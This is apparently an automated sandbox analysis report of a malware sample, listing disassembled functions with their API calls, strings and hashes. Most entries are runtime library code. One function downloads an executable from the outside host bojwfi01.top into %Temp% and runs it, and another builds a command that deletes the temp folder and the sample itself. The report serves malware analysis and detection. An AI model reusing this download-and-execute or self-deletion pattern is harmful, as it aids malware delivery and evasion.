Instruction ID: 585df4ed8e9b07e7c1a4c793ee436c9d7deb6d4646b455c78bb7b4b7eac3af9d
Opcode Fuzzy Hash: c6bd5adc19e14c474e418e2db97026603a5d5e64daee1f1162832f2fd3f105cb
Instruction Fuzzy Hash: 99D1D3707017058BC720DF65C4806FBB7E2FF89308F14492EE59A87251EB79B996CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004230B1, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004230B0,?,?,?,?), ref: 004230D3
TerminateProcess.KERNEL32(00000000,?,004230B0,?,?,?,?), ref: 004230DA
ExitProcess.KERNEL32 ref: 004230EC

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 753c0fe24a20e17db3215f7c6e544d231d893764cdcb91a0a14c3322a12d95e0
Instruction ID: 4641eed48fe800a8baa9680a7538f420db501488afd34da024cfce8cedd1c2d0
Opcode Fuzzy Hash: 753c0fe24a20e17db3215f7c6e544d231d893764cdcb91a0a14c3322a12d95e0
Instruction Fuzzy Hash: 5DE0BF31600954AFCF116F59EC09E593B79FB41356B848425F80586131CF3EDE52CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00410E50, Relevance: 4.0, Strings: 3, Instructions: 200COMMON

Download Yara Rule

Strings

ct_init: 256+dist != 512, xrefs: 00410FE5
ct_init: dist != 256, xrefs: 00410F62
ct_init: length != 256, xrefs: 00410EF2

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ct_init: 256+dist != 512$ct_init: dist != 256$ct_init: length != 256
API String ID: 0-2704465662
Opcode ID: 7d2bfca88ee75decba766ea707fd6a4045b7a4c1b4f181c5400c8212a05615e0
Instruction ID: 4ae749fbce0dcb7128c47a2629b14458315149797c9c23bbc85e9c509837f6d0
Opcode Fuzzy Hash: 7d2bfca88ee75decba766ea707fd6a4045b7a4c1b4f181c5400c8212a05615e0
Instruction Fuzzy Hash: 0571D3356017868BE324CF25C5817EBB7E1FF89304F05493ED19A8B760E7B8A58AC745

Uniqueness

Uniqueness Score: -1.00%

Function 004223F0, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5cc446a5ce37a8a00a79389eb33da02ba33ceb8d756ebeefd14d710bc9fd04
Instruction ID: 422bf7bce22379bf7c35242b617e41cbf690530914a680bc3efa2ec9ccfdf146
Opcode Fuzzy Hash: 4e5cc446a5ce37a8a00a79389eb33da02ba33ceb8d756ebeefd14d710bc9fd04
Instruction Fuzzy Hash: 90F18F71E00229AFDF14CFA9D9806AEB7B1FF88314F55826EE815A7340D774AE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004327BD, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004327B8,?,?,00000008,?,?,00432450,00000000), ref: 004329EA

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 288c8de5e24d8a216a00935399d85f439440d1102022adce1179260b80335a2a
Instruction ID: 5084df8d617cf1b7af26dbeac821e44dad35285b3e9cdb0cc81778313233e75f
Opcode Fuzzy Hash: 288c8de5e24d8a216a00935399d85f439440d1102022adce1179260b80335a2a
Instruction Fuzzy Hash: 77B16B31610609DFD728CF28C586B657BE0FF09364F259659E89ACF3A1C379E982CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00416891, Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004168A7

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 632189a00c241fa9fb7b1aa27ad1916096d0275ff53a41008da8237ba516b3be
Instruction ID: 77e6049745c7a14439d999c07a7058cb41e5a02650618c9a28f2259d4586ca86
Opcode Fuzzy Hash: 632189a00c241fa9fb7b1aa27ad1916096d0275ff53a41008da8237ba516b3be
Instruction Fuzzy Hash: CC519BB69102058FEB28CF55DA807AABBF1FB49314F15C06AE905EB751D3B8D940CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042ABC1, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a33c47381c060320a2e568e91828c7740966ab5628aecb714f6b87538fffe70
Instruction ID: 6cddfe850f206f78913078f63fb83a3f2419717a531d66a5125c8d53871b3fba
Opcode Fuzzy Hash: 8a33c47381c060320a2e568e91828c7740966ab5628aecb714f6b87538fffe70
Instruction Fuzzy Hash: 8E31F772A00229AFCB24DF69DC89DBB77BAEB84310F94415DFD1593241EA34AE50CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00416BF7, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00016C03,004166BF), ref: 00416BFC

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 56b75bb612414a1f1baf54a08eff3f171e4fc8b4486b45a8df0d72fcded1bab7
Instruction ID: 656200b8df6a99a7d526e88eb46b6253e1dda16edc7f6ea5b6404d4dd8feadc0
Opcode Fuzzy Hash: 56b75bb612414a1f1baf54a08eff3f171e4fc8b4486b45a8df0d72fcded1bab7
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0041B994, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 0041BB2C

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0635be91e9a43ac54568cbb095152b7bfee3b8f7cd87ce42c848dc9a70d2291a
Instruction ID: 94f14f582f3bff31fa0ae3671d0ea0b8def13b318a35acd1be39364966ffd64b
Opcode Fuzzy Hash: 0635be91e9a43ac54568cbb095152b7bfee3b8f7cd87ce42c848dc9a70d2291a
Instruction Fuzzy Hash: AF613FB074060956CB389A298882BFF63A5EF01744F04051FE682DBB85D76DADC2C3CE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4FD, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0041B679

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 43f1a07a53d9d75a4fd978d4e96f84307978ef319edbd8efce3f5ac77a9beb4a
Instruction ID: b8da695107d77dbba82d047142eef0e5c45ccc3987ce70383cffd896a1c40b42
Opcode Fuzzy Hash: 43f1a07a53d9d75a4fd978d4e96f84307978ef319edbd8efce3f5ac77a9beb4a
Instruction Fuzzy Hash: A85135B0240648AADB289B2989957FF679BDB2134CF18441FE482D7392D71D9DC583CF

Uniqueness

Uniqueness Score: -1.00%

Function 0042C070, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0042C070

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 13ef1b19647ce1f205dba017df90e3572e6e0f830ece238f191ef62609cb4563
Instruction ID: b20a65e82b641c4fcbe00e45d437bfb32a9135c2ff02e92e691d0702de4a1871
Opcode Fuzzy Hash: 13ef1b19647ce1f205dba017df90e3572e6e0f830ece238f191ef62609cb4563
Instruction Fuzzy Hash: 08A01230102901CB43044F315A0420C36A8750578131280386401C0220D62141005604

Uniqueness

Uniqueness Score: -1.00%

Function 00420429, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 547438fd704ed4c5539c59f21ec4ce217702f62870f386ea797f08a33cec8ce3
Instruction ID: 13816131e5e5e20cd21594707c0bc2b9046144c43c141b4337f8b44b72fcd691
Opcode Fuzzy Hash: 547438fd704ed4c5539c59f21ec4ce217702f62870f386ea797f08a33cec8ce3
Instruction Fuzzy Hash: BA518171E00119EFDF04CF99D981AAEBBB2EF88314F58809DE515AB342C7389E51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0043042F, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5b169a0ac3e31ee4cdaa51f8b1a434c154ed2649169940f821f1aaa4f60f87
Instruction ID: fe4d31472708007f1091590df337c24a64514745b2f14192b9a487a4331d36e9
Opcode Fuzzy Hash: 7b5b169a0ac3e31ee4cdaa51f8b1a434c154ed2649169940f821f1aaa4f60f87
Instruction Fuzzy Hash: D721B373F204394B7B0CC57E8C522BDB6E1C78C601745823AF8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 0043030F, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202bb8c0c00599add0fc0bcb6284eb3780e9334701fc9bb412ad2bd96266fea4
Instruction ID: ab1768e0b2de08a388fd18bb26ca37ce33fd0d795a298d93947561e7482b589e
Opcode Fuzzy Hash: 202bb8c0c00599add0fc0bcb6284eb3780e9334701fc9bb412ad2bd96266fea4
Instruction Fuzzy Hash: 1F118623F30C255B775C816D8C172BAA5D6EBDC25074F533ADC26E7284E9A4DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 00433800, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: bfd98f030e4bf4ecbfc7c48afb0c1351b701486baaf1b9a10a3ad52f9e6a1722
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 01113B7720008283E60DAE2DC4B85B793D5EECD327F2D627BF0514B744C22A9B459A08

Uniqueness

Uniqueness Score: -1.00%

Function 00413580, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 900e58b90492d58245829199317ff5d5f168c31b2c00d97b283f1b75a57077df
Instruction ID: 7641c7e178061dc03834fba44f4d158e51030fa16b736c05c857efd4f4192e13
Opcode Fuzzy Hash: 900e58b90492d58245829199317ff5d5f168c31b2c00d97b283f1b75a57077df
Instruction Fuzzy Hash: 922165705260B15AD70C4B6AAC25437FBA0AB472133CB47AFD987DA0D2C53DD164E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042A824, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8394d30aa915151beb7fc35bbbb7b63de16f3cc9f67b56ad5c5aa0e15bed50
Instruction ID: 51affe5aab557a8067aebc31762701527af383da160f115fc725f3fd696cf84b
Opcode Fuzzy Hash: fc8394d30aa915151beb7fc35bbbb7b63de16f3cc9f67b56ad5c5aa0e15bed50
Instruction Fuzzy Hash: 26E08C72A11238EBCB15EB89D90598AF3FCEB44B44B51049BF901D3200C274DE00C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 0042B90D, Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0042B937
_free.LIBCMT ref: 0042BA10
_free.LIBCMT ref: 0042BA3D

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 558f08cb0ed8c3abf4531eadc4ea43454343a9820e0df4905791bd749f934d0e
Instruction ID: 7e24ff49c087647ecc1e827e4f778859024c9178dcebcd0d08c6e63b53638690
Opcode Fuzzy Hash: 558f08cb0ed8c3abf4531eadc4ea43454343a9820e0df4905791bd749f934d0e
Instruction Fuzzy Hash: 66D13871B00225AFDB20AF75B842B6E7BA8EF01714F84416FE911D7285EB3D99408BDC

Uniqueness

Uniqueness Score: -1.00%

Function 0042CDBB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0042CDFF

Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C987
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C999
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9AB
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9BD
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9CF
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9E1
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042C9F3
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA05
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA17
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA29
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA3B
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA4D
Part of subcall function 0042C96A: _free.LIBCMT ref: 0042CA5F

_free.LIBCMT ref: 0042CDF4

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

_free.LIBCMT ref: 0042CE16
_free.LIBCMT ref: 0042CE2B
_free.LIBCMT ref: 0042CE36
_free.LIBCMT ref: 0042CE58
_free.LIBCMT ref: 0042CE6B
_free.LIBCMT ref: 0042CE79
_free.LIBCMT ref: 0042CE84
_free.LIBCMT ref: 0042CEBC
_free.LIBCMT ref: 0042CEC3
_free.LIBCMT ref: 0042CEE0
_free.LIBCMT ref: 0042CEF8

Strings

)D, xrefs: 0042CDD1

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: )D
API String ID: 161543041-4076570000
Opcode ID: 72cad83cb707e3760f5cc340b9f4f71e97d9eb79551cf2e0109430a87e05c2c2
Instruction ID: 17de8832ddb374441d57f5061042597303cc03b469bf3c66ee3829a99051513f
Opcode Fuzzy Hash: 72cad83cb707e3760f5cc340b9f4f71e97d9eb79551cf2e0109430a87e05c2c2
Instruction Fuzzy Hash: DF316C72700224DFEB20AA39E881B5F77E8EF40715F92485BE069D7251DB38F990CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDC0, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 71filesleepnetworkCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%Temp%\File.exe,00000000,00000208), ref: 0040EDD4
DeleteFileW.KERNEL32(00000000), ref: 0040EDDE
Sleep.KERNEL32(?), ref: 0040EE18
URLDownloadToFileW.URLMON(00000000,http://bojwfi01.top/download.php?file=lv.exe,00000000,00000000,00000000), ref: 0040EE2E
Sleep.KERNEL32(?), ref: 0040EE68
CreateFileW.KERNEL32(00000080,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040EE89
CloseHandle.KERNEL32(00000000), ref: 0040EE95
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040EEAD

Strings

http://bojwfi01.top/download.php?file=lv.exe, xrefs: 0040EE27
open, xrefs: 0040EEA6
%Temp%\File.exe, xrefs: 0040EDCF

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$Sleep$CloseCreateDeleteDownloadEnvironmentExecuteExpandHandleShellStrings
String ID: %Temp%\File.exe$http://bojwfi01.top/download.php?file=lv.exe$open
API String ID: 1827602710-3002260721
Opcode ID: 06e4115442e791c11a396ddc629e32d93b007718aa7663ea7e11aa6c47139a8a
Instruction ID: 0c381dc1caa1dcecdecca2c754032461df6aa4156044d7fa6adab5a0a5bd025b
Opcode Fuzzy Hash: 06e4115442e791c11a396ddc629e32d93b007718aa7663ea7e11aa6c47139a8a
Instruction Fuzzy Hash: 6821D5B0A84304B6F314A7A1DC4EF9A37A96B04705F50053AF251E90E1DBFC9548C76E

Uniqueness

Uniqueness Score: -1.00%

Function 00418017, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00418112
type_info::operator==.LIBVCRUNTIME ref: 00418139
___TypeMatch.LIBVCRUNTIME ref: 00418245
IsInExceptionSpec.LIBVCRUNTIME ref: 00418320
_UnwindNestedFrames.LIBCMT ref: 004183A7
CallUnexpected.LIBVCRUNTIME ref: 004183C2

Strings

csm, xrefs: 004180BF
csm, xrefs: 00418052
csm, xrefs: 00418170

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: fd7e0caea3e00f6aee01cd58af5106397b210f9a0e2b20e1780cbc901d9c2b8a
Instruction ID: 0281f0fe176ffed81ae8d673e133c63cb0f53b0eb1afd143364d120adbfa72d2
Opcode Fuzzy Hash: fd7e0caea3e00f6aee01cd58af5106397b210f9a0e2b20e1780cbc901d9c2b8a
Instruction Fuzzy Hash: 02C17871904209EFCF15DFA5C8819EEBBB5BF18314F18415FE8146B202DB39DAA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00425BE1, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00425BF7

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

_free.LIBCMT ref: 00425C03
_free.LIBCMT ref: 00425C0E
_free.LIBCMT ref: 00425C19
_free.LIBCMT ref: 00425C24
_free.LIBCMT ref: 00425C2F
_free.LIBCMT ref: 00425C3A
_free.LIBCMT ref: 00425C45
_free.LIBCMT ref: 00425C50
_free.LIBCMT ref: 00425C5E

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7dde9fdba9a4a9f0dd814b2f33e74bdbd18d422245b0bdf45c664078d5d674a0
Instruction ID: b90bb9bfc20cfabe93cc44a8396d028678ad5780f5c2d215824c22f92778cbc7
Opcode Fuzzy Hash: 7dde9fdba9a4a9f0dd814b2f33e74bdbd18d422245b0bdf45c664078d5d674a0
Instruction Fuzzy Hash: 2421C676A00118EFCF01EF95D881DEE7FB8EF48704B8141AAB515EB121DB39EA548B84

Uniqueness

Uniqueness Score: -1.00%

Function 00431F53, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004318BF), ref: 00431F6C

Strings

log, xrefs: 00431FC9, 00431FD8
exp, xrefs: 00431FEB, 00432050
asin, xrefs: 00432099
acos, xrefs: 004320A2
pow, xrefs: 0043200A, 004320B4, 00432101
sqrt, xrefs: 004320AB
log10, xrefs: 00431FAE, 00431FBD

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 62ec68b3863c4366ea564d45712310c1cb92d41fbd87b7e105d8dea48637823f
Instruction ID: 7c87a64087a321a1dce7a854cc06c944ef4979651dfc933242cd0044de019eaf
Opcode Fuzzy Hash: 62ec68b3863c4366ea564d45712310c1cb92d41fbd87b7e105d8dea48637823f
Instruction Fuzzy Hash: 71518E7090060ACBCF148F58EA4C1AEBBB0FB4D304F516147D691A6264C7FD8A2ACF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00402C3C
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000208), ref: 00402C53
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00402CC1
ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00402DF9

Strings

& timeout 4 & del /f /q ", xrefs: 00402C6B
/c rd /s /q %Temp%\, xrefs: 00402C5E
%ComSpec%, xrefs: 00402C4E

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$ExecuteFileModuleNameShell
String ID: & timeout 4 & del /f /q "$%ComSpec%$/c rd /s /q %Temp%\
API String ID: 112506409-2810557889
Opcode ID: 54596d0525a52ef080fda4aa49ef8aecfafc5ac37f7160843fd9d483d8d92172
Instruction ID: 10d3b32a02bf9cc6d91846d8616a5b81338913b4ecae8d650c28195380590b1b
Opcode Fuzzy Hash: 54596d0525a52ef080fda4aa49ef8aecfafc5ac37f7160843fd9d483d8d92172
Instruction Fuzzy Hash: CE513870A00108ABDB04DB64DE89BDD7775EF85304F208229F505AB6D4DB7D9A84CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004293FF, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

f!@, xrefs: 00429407
ext-ms-, xrefs: 0042946A
api-ms-, xrefs: 00429456

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-$f!@
API String ID: 0-2828910582
Opcode ID: 14c15d92a03c1bd5d14caaf599a631f2a7729f3b692d30db7766dcce4d7314a2
Instruction ID: 3fdf87e3b28de1d31ca978d63363a00e38af72533481e6e0b1591bac7ecb3151
Opcode Fuzzy Hash: 14c15d92a03c1bd5d14caaf599a631f2a7729f3b692d30db7766dcce4d7314a2
Instruction Fuzzy Hash: AF21D575F09630ABCB21AB64FC45B1B3758AF41770F640666EC06A7390D738EC0285DC

Uniqueness

Uniqueness Score: -1.00%

Function 004179C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004179F7
___except_validate_context_record.LIBVCRUNTIME ref: 004179FF
_ValidateLocalCookies.LIBCMT ref: 00417A88
__IsNonwritableInCurrentImage.LIBCMT ref: 00417AB3
_ValidateLocalCookies.LIBCMT ref: 00417B08

Strings

csm, xrefs: 00417A9D

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 60d1f9988f94e84f7df48bea0a640f19cadad33a8ab1e9a08ecb32c9182d6e3d
Instruction ID: e8476ab28395cd8dc9f24e1359e818e6a09ef4f1306427bc3beaeb26a26fc396
Opcode Fuzzy Hash: 60d1f9988f94e84f7df48bea0a640f19cadad33a8ab1e9a08ecb32c9182d6e3d
Instruction Fuzzy Hash: C541E534A042099BCF10DF69C880ADEBBB1EF44358F14809BE8145B392D779AF95CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0042CB09, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042CAD1: _free.LIBCMT ref: 0042CAF6

_free.LIBCMT ref: 0042CB57

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

_free.LIBCMT ref: 0042CB62
_free.LIBCMT ref: 0042CB6D
_free.LIBCMT ref: 0042CBC1
_free.LIBCMT ref: 0042CBCC
_free.LIBCMT ref: 0042CBD7
_free.LIBCMT ref: 0042CBE2

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7ae0fb44a3ec765acb8fc691160abd3676b5497db462958d68dbc8fa1dcad0c2
Instruction ID: 1268741570c9608384a99cd3f017357ce27c762ae06beea27056b3e64a6ba217
